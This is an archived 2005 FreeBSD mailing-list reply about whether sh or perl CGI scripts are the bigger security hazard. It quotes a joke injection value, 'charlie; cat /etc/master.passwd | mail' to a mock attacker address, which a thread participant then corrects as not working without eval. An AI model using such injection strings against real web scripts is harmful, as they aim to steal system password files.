From owner-freebsd-questions@FreeBSD.ORG  Sat Feb  5 06:19:34 2005
Return-Path: <owner-freebsd-questions@FreeBSD.ORG>
Delivered-To: freebsd-questions@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id F1EE316A4CE
	for <freebsd-questions@freebsd.org>;
	Sat,  5 Feb 2005 06:19:33 +0000 (GMT)
Received: from hosea.tallye.com (joel.tallye.com [216.99.199.78])
	by mx1.FreeBSD.org (Postfix) with ESMTP id D635543D2D
	for <freebsd-questions@freebsd.org>;
	Sat,  5 Feb 2005 06:19:32 +0000 (GMT)
	(envelope-from lorenl@alzatex.com)
Received: from hosea.tallye.com (hosea.tallye.com [127.0.0.1])
	by hosea.tallye.com (8.12.8/8.12.10) with ESMTP id j156JJGf017634
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO);
	Fri, 4 Feb 2005 22:19:19 -0800
Received: (from sttng359@localhost)
	by hosea.tallye.com (8.12.8/8.12.10/Submit) id j156JIDv017632;
	Fri, 4 Feb 2005 22:19:18 -0800
X-Authentication-Warning: hosea.tallye.com: sttng359 set sender to
	lorenl@alzatex.com using -f
Date: Fri, 4 Feb 2005 22:19:18 -0800
From: "Loren M. Lang" <lorenl@alzatex.com>
To: Dan Nelson <dnelson@allantgroup.com>
Message-ID: <20050205061918.GG8619@alzatex.com>
References: <200501251530.06424.shinjii@virusinfo.rdksupportinc.com>
	<20050125055301.GB16896@xor.obsecurity.org>
	<ef60af0905012500265eb38b66@mail.gmail.com>
	<EB3282A396FFCC78382D2E81@utd49554.utdallas.edu>
	<ef60af090501251100472d6fb6@mail.gmail.com>
	<20050125194736.GD76109@xor.obsecurity.org>
	<ef60af09050125142353301be4@mail.gmail.com>
	<ef60af09050125144166ecaae4@mail.gmail.com>
	<20050205034440.GF8619@alzatex.com> <20050205041344.GK25463@dan.emsphone.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20050205041344.GK25463@dan.emsphone.com>
User-Agent: Mutt/1.4.1i
X-GPG-Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc
X-GPG-Fingerprint: B3B9 D669 69C9 09EC 1BCD  835A FAF3 7A46 E4A3 280C
cc: Paul Schmehl <pauls@utdallas.edu>
cc: "Donald J. O'Neill" <donaldj1066@fastmail.fm>
cc: Warren <shinjii@virusinfo.rdksupportinc.com>
cc: Gert Cuykens <gert.cuykens@gmail.com>
cc: "Loren M. Lang" <lorenl@alzatex.com>
cc: Kris Kennaway <kris@obsecurity.org>
cc: freebsd-questions@freebsd.org
Subject: Re: perl and ports
X-BeenThere: freebsd-questions@freebsd.org
X-Mailman-Version: 2.1.1
Precedence: list
List-Id: User questions <freebsd-questions.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-questions>,
	<mailto:freebsd-questions-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-questions>
List-Post: <mailto:freebsd-questions@freebsd.org>
List-Help: <mailto:freebsd-questions-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-questions>,
	<mailto:freebsd-questions-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Sat, 05 Feb 2005 06:19:34 -0000

On Fri, Feb 04, 2005 at 10:13:45PM -0600, Dan Nelson wrote:
> In the last episode (Feb 04), Loren M. Lang said:
> > Actually, I think you should work on sh first, it's a much bigger
> > security hazard than perl.  If you've ever written much sh, you'd
> > realize with it's much loser syntax, it's easy to get into trouble. 
> > At least perl provides use strict and -Tw.  Someone using sh to write
> > cgi scripts is the worst.  Imagine someone writing the following like
> > for a sh cgi script where $USERNAME is a cgi paramater passed into
> > the following script:
> > 
> > echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
> > 
> > What if someone wrote the following username and apache was running as
> > root:
> > 
> > charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo
> 
> Then you would get a web page containing:
> 
> <HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo</TITLE></HEAD>
> 
> .  The shell doesn't re-interpret its input unless explicitly told to
> via the "eval" command.  /bin/sh is a little limited for more complex
> scripts due to its lack of arrays, though, so zsh/ksh/bash are much
> better choices :)

Well, my email was meant as a joke and I didn't bother to validate anything
I wrote, I just remember reading something along these lines in a cgi book
warning of the dangers of sh scripting for cgi scripts.  The original
example was more elaborate and probably did use eval, but my point is
that sh can be more dangerous than perl since it uses a looser syntax.
By not using "'s around $USERNAME, it will end up being parsed as
multiple arguments which, for echo, isn't a big deal, but for most
commands you can end up shooting your self in the foot.  I definetly would
not recommend removing it from the system or even recommend against using
it for anything, but just pointing at the irony of considering perl a
giant security hole.

Mostly, I have just found this whole thread very humorous, and I wonder
what the reaction of the developers will be when he trys asking them to
stop using perl.

> 
> -- 
> 	Dan Nelson
> 	dnelson@allantgroup.com

-- 
I sense much NT in you.
NT leads to Bluescreen.
Bluescreen leads to downtime.
Downtime leads to suffering.
NT is the path to the darkside.
Powerful Unix is.

Public Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc
Fingerprint: B3B9 D669 69C9 09EC 1BCD  835A FAF3 7A46 E4A3 280C